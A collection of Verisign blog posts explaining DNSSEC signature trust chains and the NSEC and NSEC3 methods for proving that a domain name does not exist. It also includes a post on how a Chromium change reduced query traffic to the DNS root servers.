By Burt Kaliski

This is the second in a multi-part blog series on cryptography and the Domain Name System (DNS).

In my previous post, I described the first broad scale deployment of cryptography in the DNS, known as the Domain Name System Security Extensions (DNSSEC). I described how a name server can enable a requester to validate the correctness of a “positive” response to a query — when a queried domain name exists — by adding a digital signature to the DNS response returned.

The designers of DNSSEC, as well as academic researchers, have separately considered the answer of “negative” responses – when the domain name doesn’t exist. In this case, as I’ll explain, responding with a signed “does not exist” is not the best design. This makes the non-existence case interesting from a cryptographer’s perspective as well.

Initial Attempts

Consider a domain name like example.arpa that doesn’t exist.

If it did exist, then as I described in my previous post, the second-level domain (SLD) server for example.arpa would return a response signed by example.arpa’s zone signing key (ZSK).

So a first try for the case that the domain name doesn’t exist is for the SLD server to return the response “example.arpa doesn’t exist,” signed by example.arpa’s ZSK.

However, if example.arpa doesn’t exist, then example.arpa won’t have either an SLD server or a ZSK to sign with. So, this approach won’t work.

A second try is for the parent name server — the .arpa top-level domain (TLD) server in the example — to return the response “example.arpa doesn’t exist,” signed by the parent’s ZSK.

This could work if the .arpa DNS server knows the ZSK for .arpa. However, for security and performance reasons, the design preference for DNSSEC has been to keep private keys offline, within the zone’s provisioning system.

The provisioning system can precompute statements about domain names that do exist — but not about every possible individual domain name that doesn’t exist. So, this won’t work either, at least not for the servers that keep their private keys offline.

The third try is the design that DNSSEC settled on. The parent name server returns a “range statement,” previously signed with the ZSK, that states that there are no domain names in an ordered sequence between two “endpoints” where the endpoints depend on domain names that do exist. The range statements can therefore be signed offline, and yet the name server can still choose an appropriate signed response to return, based on the (non-existent) domain name in the query.

The DNS community has considered several approaches to constructing range statements, and they have varying cryptographic properties. Below I’ve described two such approaches. For simplicity, I’ve focused just on the basics in the discussion that follows. The astute reader will recognize that there are many more details involved both in the specification and the implementation of these techniques.

NSEC

The first approach, called NSEC, involved no additional cryptography beyond the DNSSEC signature on the range statement. In NSEC, the endpoints are actual domain names that exist. NSEC stands for “Next Secure,” referring to the fact that the second endpoint in the range is the “next” existing domain name following the first endpoint.

The NSEC resource record is documented in one of the original DNSSEC specifications, RFC4033, which was co-authored by Verisign.

The .arpa zone implements NSEC. When the .arpa server receives the request “What is the IP address of example.arpa,” it returns the response “There are no names between e164.arpa and home.arpa.” This exchange is shown in the figure below and is analyzed in the associated DNSviz graph. (The response is accurate as of the writing of this post; it could be different in the future if names were added to or removed from the .arpa zone.)

NSEC has a side effect: responses immediately reveal unqueried domain names in the zone. Depending on the sensitivity of the zone, this may be undesirable from the perspective of the minimum disclosure principle.

Figure 1. An example of a NSEC proof of non-existence (as of the writing of this post)
Figure 1. An example of a NSEC proof of non-existence (as of the writing of this post).

NSEC3

A second approach, called NSEC3 reduces the disclosure risk somewhat by defining the endpoints as hashes of existing domain names. (NSEC3 is documented in RFC 5155, which was also co-authored by Verisign.)

An example of NSEC3 can be seen with example.name, another domain that doesn’t exist. Here, the .name TLD server returns a range statement that “There are no domain names with hashes between 5SU9… and 5T48…”. Because the hash of example.name is “5SVV…” the response implies that “example.name” doesn’t exist.

This statement is shown in the figure below and in another DNSviz graph. (As above, the actual response could change if the .name zone changes.)

Figure 2. An example of a NSEC3 proof of non-existence based on a hash function (as of the writing of this post)
Figure 2. An example of a NSEC3 proof of non-existence based on a hash function (as of the writing of this post).

To find out which domain name corresponds to one of the hashed endpoints, an adversary would have to do a trial-and-error or “dictionary” attack across multiple guesses of domain names, to see if any has a matching hash value. Such a search could be performed “offline,” i.e., without further interaction with the name server, which is why the disclosure risk is only somewhat reduced.

NSEC and NSEC3 are mutually exclusive. Nearly all TLDs, including all TLDs operated by Verisign, implement NSEC3. In addition to .arpa, the root zone also implements NSEC.

In my next post, I’ll describe NSEC5, an approach still in the experimental stage, that replaces the hash function in NSEC3 with a verifiable random function (VRF) to protect against offline dictionary attacks. I’ll also share some research Verisign Labs has done on a complementary approach that helps protect a client’s queries for non-existent domain names from disclosure.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3 appeared first on Verisign Blog.

The Domain Name System: A Cryptographer’s Perspective

By Burt Kaliski
Man looking at technical imagery

This is the first in a multi-part blog series on cryptography and the Domain Name System (DNS).

As one of the earliest protocols in the internet, the DNS emerged in an era in which today’s global network was still an experiment. Security was not a primary consideration then, and the design of the DNS, like other parts of the internet of the day, did not have cryptography built in.

Today, cryptography is part of almost every protocol, including the DNS. And from a cryptographer’s perspective, as I described in my talk at last year’s International Cryptographic Module Conference (ICMC20), there’s so much more to the story than just encryption.

Where It All Began: DNSSEC

The first broad-scale deployment of cryptography in the DNS was not for confidentiality but for data integrity, through the Domain Name System Security Extensions (DNSSEC), introduced in 2005.

The story begins with the usual occurrence that happens millions of times a second around the world: a client asks a DNS resolver a query like “What is example.com’s Internet Protocol (IP) address?” The resolver in this case answers: “example.com’s IP address is 93.184.216.34”. (This is the correct answer.)

If the resolver doesn’t already know the answer to the request, then the process to find the answer goes something like this:

  • With qname minimization, when the resolver receives this request, it starts by asking a related question to one of the DNS’s 13 root servers, such as the A and J root servers operated by Verisign: “Where is the name server for the .com top-level domain (TLD)?”
  • The root server refers the resolver to the .com TLD server.
  • The resolver asks the TLD server, “Where is the name server for the example.com second-level domain (SLD)?”
  • The TLD server then refers the resolver to the example.com server.
  • Finally, the resolver asks the SLD server, “What is example.com’s IP address?” and receives an answer: “93.184.216.34”.

Digital Signatures

But how does the resolver know that the answer it ultimately receives is correct? The process defined by DNSSEC follows the same “delegation” model from root to TLD to SLD as I’ve described above.

Indeed, DNSSEC provides a way for the resolver to check that the answer is correct by validating a chain of digital signatures, by examining digital signatures at each level of the DNS hierarchy (or technically, at each “zone” in the delegation process). These digital signatures are generated using public key cryptography, a well-understood process that involves encryption using key pairs, one public and one private.

In a typical DNSSEC deployment, there are two active public keys per zone: a Key Signing Key (KSK) public key and a Zone Signing Key (ZSK) public key. (The reason for having two keys is so that one key can be changed locally, without the other key being changed.)

The responses returned to the resolver include digital signatures generated by either the corresponding KSK private key or the corresponding ZSK private key.

Using mathematical operations, the resolver checks all the digital signatures it receives in association with a given query. If they are valid, the resolver returns the “Digital Signature Validated” indicator to the client that initiated the query.

Trust Chains

Figure 1 A Simplified View of the DNSSEC Chain.
Figure 1: A Simplified View of the DNSSEC Chain.

A convenient way to visualize the collection of digital signatures is as a “trust chain” from a “trust anchor” to the DNS record of interest, as shown in the figure above. The chain includes “chain links” at each level of the DNS hierarchy. Here’s how the “chain links” work:

The root KSK public key is the “trust anchor.” This key is widely distributed in resolvers so that they can independently authenticate digital signatures on records in the root zone, and thus authenticate everything else in the chain.

The root zone chain links consist of three parts:

  1. The root KSK public key is published as a DNS record in the root zone. It must match the trust anchor.
  2. The root ZSK public key is also published as a DNS record. It is signed by the root KSK private key, thus linking the two keys together.
  3. The hash of the TLD KSK public key is published as a DNS record. It is signed by the root ZSK private key, further extending the chain.

The TLD zone chain links also consist of three parts:

  1. The TLD KSK public key is published as a DNS record; its hash must match the hash published in the root zone.
  2. The TLD ZSK public key is published as a DNS record, which is signed by the TLD KSK private key.
  3. The hash of the SLD KSK public key is published as a DNS record. It is signed by the TLD ZSK private key.

The SLD zone chain links once more consist of three parts:

  1. The SLD KSK public key is published as a DNS record. Its hash, as expected, must match the hash published in the TLD zone.
  2. The SLD ZSK public key is published as a DNS record signed by the SLD KSK private key.
  3. A set of DNS records – the ultimate response to the query – is signed by the SLD ZSK private key.

A resolver (or anyone else) can thereby verify the signature on any set of DNS records given the chain of public keys leading up to the trust anchor.

Note that this is a simplified view, and there are other details in practice. For instance, the various KSK public keys are also signed by their own private KSK, but I’ve omitted these signatures for brevity. The DNSViz tool provides a very nice interactive interface for browsing DNSSEC trust chains in detail, including the trust chain for example.com discussed here.

Updating the Root KSK Public Key

The effort to update the root KSK public key, the aforementioned “trust anchor” was one of the challenging and successful projects by the DNS community over the past couple of years. This initiative – the so-called “root KSK rollover” – was challenging because there was no easy way to determine whether resolvers actually had been updated to use the latest root KSK — remember that cryptography and security was added on rather than built into the DNS. There are many resolvers that needed to be updated, each independently managed.

The research paper “Roll, Roll, Roll your Root: A Comprehensive Analysis of the First Ever DNSSEC Root KSK Rollover” details the process of updating the root KSK. The paper, co-authored by Verisign researchers and external colleagues, received the distinguished paper award at the 2019 Internet Measurement Conference.

Final Thoughts

I’ve focused here on how a resolver validates correctness when the response to a query has a “positive” answer — i.e., when the DNS record exists. Checking correctness when the answer doesn’t exist gets even more interesting from a cryptographer’s perspective. I’ll cover this topic in my next post.

Read the complete six blog series:

  1. The Domain Name System: A Cryptographer’s Perspective
  2. Cryptographic Tools for Non-Existence in the Domain Name System: NSEC and NSEC3
  3. Newer Cryptographic Advances for the Domain Name System: NSEC5 and Tokenized Queries
  4. Securing the DNS in a Post-Quantum World: New DNSSEC Algorithms on the Horizon
  5. Securing the DNS in a Post-Quantum World: Hash-Based Signatures and Synthesized Zone Signing Keys
  6. Information Protection for the Domain Name System: Encryption and Minimization

The post The Domain Name System: A Cryptographer’s Perspective appeared first on Verisign Blog.

Chromium’s Reduction of Root DNS Traffic

By Verisign
Search Bar

As we begin a new year, it is important to look back and reflect on our accomplishments and how we can continue to improve. A significant positive the DNS community could appreciate from 2020 is the receptiveness and responsiveness of the Chromium team to address the large amount of DNS queries being sent to the root server system.

In a previous blog post, we quantified that upwards of 45.80% of total DNS traffic to the root servers was, at the time, the result of Chromium intranet redirection detection tests. Since then, the Chromium team has redesigned its code to disable the redirection test on Android systems and introduced a multi-state DNS interception policy that supports disabling the redirection test for desktop browsers. This functionality was released mid-November of 2020 for Android systems in Chromium 87 and, quickly thereafter, the root servers experienced a rapid decline of DNS queries.

The figure below highlights the significant decline of query volume to the root server system immediately after the Chromium 87 release. Prior to the software release, the root server system saw peaks of ~143 billion queries per day. Traffic volumes have since decreased to ~84 billion queries a day. This represents more than a 41% reduction of total query volume.

Note: Some data from root operators was not available at the time of this publication.

This type of broad root system measurement is facilitated by ICANN’s Root Server System Advisory Committee standards document RSSAC002, which establishes a set of baseline metrics for the root server system. These root server metrics are readily available to the public for analysis, monitoring, and research. These metrics represent another milestone the DNS community could appreciate and continue to support and refine going forward.

Rightly noted in ICANN’s Root Name Service Strategy and Implementation publication, the root server system currently “faces growing volumes of traffic” from legitimate users but also from misconfigurations, misuse, and malicious actors and that “the costs incurred by the operators of the root server system continue to climb to mitigate these attacks using the traditional approach”.

As we reflect on how Chromium’s large impact to root server traffic was identified and then resolved, we as a DNS community could consider how outreach and engagement should be incorporated into a traditional approach of addressing DNS security, stability, and resiliency. All too often, technologists solve problems by introducing additional layers of technology abstractions and disregarding simpler solutions, such as outreach and engagement.

We believe our efforts show how such outreach and community engagement can have significant impact both to the parties directly involved, and to the broader community. Chromium’s actions will directly aide and ease the operational costs to mitigate attacks at the root. Reducing the root server system load by 41%, with potential further reduction depending on future Chromium deployment decisions, will lighten operational costs incurred to mitigate attacks by relinquishing their computing and network resources.

In pursuit of maintaining a responsible and common-sense root hygiene regimen, Verisign will continue to analyze root telemetry data and engage with entities such as Chromium to highlight operational concerns, just as Verisign has done in the past to address name collisions problems. We’ll be sharing more information on this shortly.

This piece was co-authored by Matt Thomas and Duane Wessels, Distinguished Engineers at Verisign.

The post Chromium’s Reduction of Root DNS Traffic appeared first on Verisign Blog.

❌